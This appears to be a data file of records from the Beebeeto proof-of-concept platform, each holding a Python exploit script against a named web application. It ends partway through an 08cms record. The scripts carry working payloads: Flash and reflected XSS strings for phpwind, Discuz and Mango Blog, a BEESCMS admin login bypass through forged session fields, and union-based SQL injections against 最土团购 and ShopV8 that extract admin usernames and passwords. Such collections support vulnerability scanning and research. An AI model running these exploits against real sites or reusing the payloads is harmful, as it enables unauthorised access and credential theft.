+{"create_date": "2014-10-10 11:32:36", "name": "phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0061',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',  # \u4f5c\u8005\r\n            'create_date': '2014-10-10',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['9.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Cross Site Scripting',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['phpwind', 'xss', 'FlashXSS'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2013-038433',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"e971c772b2df839298a8f8f9451f1eda\"\r\n        verify_url = args['options']['target'] + \"/res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url + '?highlighterId=bb2\\\"))}catch(e){alert(1)}//'\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0061", "layer4_protocol": null}
+{"create_date": "2014-10-09 14:21:51", "name": "phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,flashxss", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0059',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',  # \u4f5c\u8005\r\n            'create_date': '2014-10-08',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['9.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Cross Site Scripting',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['phpwind', 'xss', 'flashxss'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2013-017728',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"d85c815bc39c91725f264f291db70432\"\r\n        verify_url = args['options']['target'] + \"/res/images/uploader.swf\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url + '?jsobject=alert(1))}catch(e){}//'\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0059", "layer4_protocol": null}
+{"create_date": "2014-10-09 10:41:55", "name": "Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,flvplayer.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0057',\r\n            'name': 'Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-10-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['3.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Discuz\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'flvplayer.swf'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.ipuman.com/pm6/138/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"7d675405ff7c94fa899784b7ccae68d3\"\r\n        file_path = \"/static/image/common/flvplayer.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url + '?file=1.flv&linkfromdisplay=true&link=javascript:alert(1024);'\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0057", "layer4_protocol": null}
+{"create_date": "2014-10-08 16:54:37", "name": "Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Mango Blog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/archives.cfm/search", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0056',\r\n            'name': 'Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-10-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'MangoBlog',\r\n            'vul_version': ['1.4.1'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Mango Blog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/archives.cfm/search'],\r\n            'desc': '''\r\n                    Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\r\n                    \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\r\n                    ''',\r\n            'references': ['http://sebug.net/vuldb/ssvid-87080',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/archives.cfm/search/?term=%3Csvg%20onload=alert(100)%3E'\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if '<svg onload=alert(100)>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002", "app_name": "Mango Blog", "id": "poc-2014-0056", "layer4_protocol": null}
+{"create_date": "2014-10-05 12:37:26", "name": "BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u767b\u5f55\u7ed5\u8fc7", "tag": "Login Bypass,\u767b\u5f55\u7ed5\u8fc7,BEESCMS\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0052',\r\n            'name': 'BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-10-05',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'BEESCMS',\r\n            'vul_version': ['3.4'],\r\n            'type': 'Login Bypass',\r\n            'tag': ['Login Bypass', '\u767b\u5f55\u7ed5\u8fc7', 'BEESCMS\u6f0f\u6d1e'],\r\n            'desc': 'BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-059180',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        cookie = cookielib.CookieJar()\r\n        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\r\n        urllib2.install_opener(opener)\r\n        postdata = \"_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\\r\\n\"\r\n        # get session\r\n        request = urllib2.Request(args['options']['target'] + \"/index.php\", data=postdata)\r\n        r = urllib2.urlopen(request)\r\n        # login test\r\n        request2 = urllib2.Request(args['options']['target'] + \"/admin/admin.php\", data=postdata)\r\n        r = urllib2.urlopen(request2)\r\n        content = r.read()\r\n        if \"admin_form.php?action=form_list&nav=list_order\" in content:\r\n            if \"admin_main.php?nav=main\" in content:\r\n                args['success'] = True\r\n                args['test_method'] = 'http://www.wooyun.org/bugs/wooyun-2014-059180'\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7", "app_name": "BEESCMS", "id": "poc-2014-0052", "layer4_protocol": null}
+{"create_date": "2014-10-03 13:30:40", "name": "\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0047',\r\n            'name': '\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n            'author': 'Bug',\r\n            'create_date': '2014-10-03',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['SQL Injection', '\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.moonsec.com/post-11.html'],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/api/call.php?action=query&num=11%27%29/**/union/**/select/**/1,2,3,\"\r\n                   \"concat%280x7e,0x27,username,0x7e,0x27,password%29,5,6,7,8,9,10,11,12,13,\"\r\n                   \"14,15,16/**/from/**/user/**/limit/**/0,1%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        pattern = re.compile(r\".*?<id>\\s*~'\\s*(?P<username>[^~]+)\\s*~'\\s*(?P<password>[\\w]+)\\s*</id>\",\r\n                             re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n        match = pattern.match(content)\r\n        if match == None:\r\n            args['success'] = False\r\n            return args\r\n        username = match.group(\"username\")\r\n        password = match.group(\"password\")\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        args['poc_ret']['Username'] = username\r\n        args['poc_ret']['Password'] = password\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2014-0047", "layer4_protocol": null}
+{"create_date": "2014-10-02 11:03:23", "name": "ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,shopv8,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0045',\r\n            'name': 'ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n            'author': 'Bug',\r\n            'create_date': '2014-10-02',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'shopv8',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['10.48'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['SQL Injection', 'shopv8', '\u4fe1\u606f\u6cc4\u9732'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.shellsec.com/tech/2143.html'],  # \u53c2\u8003\u94fe\u63a5\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/admin/pinglun.asp?id=1%20and%201=2%20union%20select%201,2,3,4,\"\r\n                   \"username,password,7,8,9,10,11%20from%20admin\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        pattern = re.compile(r'.*?id=[\\'\"]?pingluntitle[\\'\"]?.*?value=[\\'\"]?(?P<username>\\w+)[\\'\"]?'#\u5339\u914d\u7528\u6237\u540d\r\n                             r'.*?id=[\\'\"]?pingluncontent[\\'\"]?.*?>(?P<password>\\w+)</textarea>',#\u5339\u914d\u5bc6\u7801\r\n                             re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n        match = pattern.match(content)\r\n        if match == None:\r\n            args['success'] = False\r\n            return args\r\n        username = match.group(\"username\")\r\n        password = match.group(\"password\")\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        args['poc_ret']['Username'] = username\r\n        args['poc_ret']['Password'] = password\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6", "app_name": "Other", "id": "poc-2014-0045", "layer4_protocol": null}
+{"create_date": "2014-09-30 22:21:24", "name": "Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS\u6f0f\u6d1e,mp3player.swf,Discuz\u6f0f\u6d1e,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0044',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'tmp',  # \u4f5c\u8005\r\n            'create_date': '2014-09-30',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['3.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Cross Site Scripting',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['XSS\u6f0f\u6d1e', 'mp3player.swf', 'Discuz\u6f0f\u6d1e', 'FlashXSS'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.ipuman.com/pm6/138/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"f73b6405a9bb7a06ecca93bfc89f8d81\"\r\n        file_path = \"/static/image/common/mp3player.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n        if args['options']['verbose']:\r\n            print '[*] Requst URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Discuz", "id": "poc-2014-0044", "layer4_protocol": null}
+{"create_date": "2014-09-30 22:05:44", "name": "08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,08cms\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0043',           # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': '08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP',  # \u540d\u79f0\r\n            'author': 'Bug',                   # \u4f5c\u8005\r\n            'create_date': '2014-09-30',    # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '08cms',    # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['3.1'], # 